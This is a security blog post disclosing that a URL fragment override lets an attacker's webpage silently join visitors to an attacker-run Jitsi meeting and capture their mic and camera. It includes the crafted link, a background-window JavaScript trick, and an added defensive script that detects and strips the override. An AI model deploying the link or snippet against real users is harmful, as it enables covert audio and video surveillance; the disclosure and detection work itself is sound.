Jitsi is an open-source web conferencing application. Jitsi also hosts a public instance, meet.jit.si, with millions of monthly active users.

Attack scenario

Let's walk through an example. An attacker runs a meeting called `MiniGinger` on the public Jitsi instance meet.jit.si. When a user visits the attacker-controlled webpage `CuteCats.com`, in the background they are redirected to:

https://meet.jit.si/MiniGinger#config.prejoinConfig.enabled=false

The `#config.prejoinConfig.enabled=false` fragment is a URL config override that disables the prejoin screen, so the browser joins the meeting immediately. If the user visited any other Jitsi meeting on meet.jit.si before and allowed it to access the mic and camera, that permission applies to the whole origin, so the attacker's meeting runs in the background without any user interaction. In this way, it is possible to get voice and video footage without the user's permission. In my honest opinion, it seems more like a problem than a feature.

What's more, we can use a trick that opens the link in the background, so the victim might not notice that something is running. This code opens a new window with the current URL, while the current window, which stays in the background, opens the Jitsi link:

```javascript
// Open a copy of the current page in a new (foreground) window.
window.open(location.href);
// Navigate the original (now background) window to the Jitsi meeting link.
location.href = 'https://meet.jit.si/MiniGinger#config.prejoinConfig.enabled=false';
```

Disclosure timeline

The article's purpose is to allow users to enhance their security. Jitsi claims that this is a feature and has no intention to fix it. I think, at the very least, they should remove it from the public instance, where the security risk is at its highest.

Message from Jitsi:

Hey @zimzi, That's a feature.

Please let me know in the comments below what you think about this feature!

Disclosure timeline:
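For defenders who want to catch links like the one in the attack scenario above before a browser opens them (for example in a link-rewriting proxy, a mail gateway or a browser extension), here is an added example that is not part of the original post and not Jitsi's own code. It parses the fragment of a Jitsi meeting URL, lists the `config.*` overrides it carries, flags the `config.prejoinConfig.enabled=false` override from the post, and produces a sanitised URL with that override removed. It assumes overrides are carried in the fragment as `&`-separated `key=value` pairs with a `config.` prefix, exactly as in the post's link; the sample URLs are constructed for illustration.

```javascript
// Added example (not from the original post, not Jitsi's own code).
// Assumption: URL config overrides are &-separated key=value pairs in the
// fragment, with keys prefixed "config." (as in the post's example link).

const PREJOIN_KEY = "config.prejoinConfig.enabled";

// Return an object of all "config.*" overrides found in the URL fragment.
function parseConfigOverrides(url) {
  const u = new URL(url);
  const fragment = u.hash.startsWith("#") ? u.hash.slice(1) : u.hash;
  const overrides = {};
  for (const pair of fragment.split("&")) {
    if (!pair) continue;
    const eq = pair.indexOf("=");
    const key = decodeURIComponent(eq === -1 ? pair : pair.slice(0, eq));
    const value = eq === -1 ? "" : decodeURIComponent(pair.slice(eq + 1));
    if (key.startsWith("config.")) overrides[key] = value;
  }
  return overrides;
}

// Classify a meeting URL: which room it targets, which overrides it carries,
// and whether the prejoin screen (the user's chance to stop the join) is off.
function assessMeetingUrl(url) {
  const u = new URL(url);
  const overrides = parseConfigOverrides(url);
  const prejoinDisabled = overrides[PREJOIN_KEY] === "false";
  return {
    room: u.pathname.replace(/^\//, ""),
    overrides,
    prejoinDisabled,
    verdict: prejoinDisabled
      ? "prejoin screen disabled via URL; silent auto-join possible"
      : "no prejoin override",
  };
}

// Mitigation: rewrite the URL without the prejoin override so the user still
// sees the prejoin screen (other fragment entries are preserved as-is).
function stripPrejoinOverride(url) {
  const u = new URL(url);
  const fragment = u.hash.startsWith("#") ? u.hash.slice(1) : u.hash;
  const kept = fragment.split("&").filter((pair) => {
    if (!pair) return false;
    const eq = pair.indexOf("=");
    const key = decodeURIComponent(eq === -1 ? pair : pair.slice(0, eq));
    return key !== PREJOIN_KEY;
  });
  u.hash = kept.join("&"); // empty string removes the "#" entirely
  return u.toString();
}

// Constructed sample URLs: the post's link and a plain meeting link.
const SAMPLE_URLS = [
  "https://meet.jit.si/MiniGinger#config.prejoinConfig.enabled=false",
  "https://meet.jit.si/MiniGinger",
];

for (const url of SAMPLE_URLS) {
  console.log(JSON.stringify(assessMeetingUrl(url)));
  console.log("sanitised:", stripPrejoinOverride(url));
}
```

The parser keeps every override rather than only the prejoin one, so the same function can feed a log line or an alert listing exactly which settings a link tried to change; stripping is deliberately limited to the one key discussed in the post, since other overrides may be legitimate.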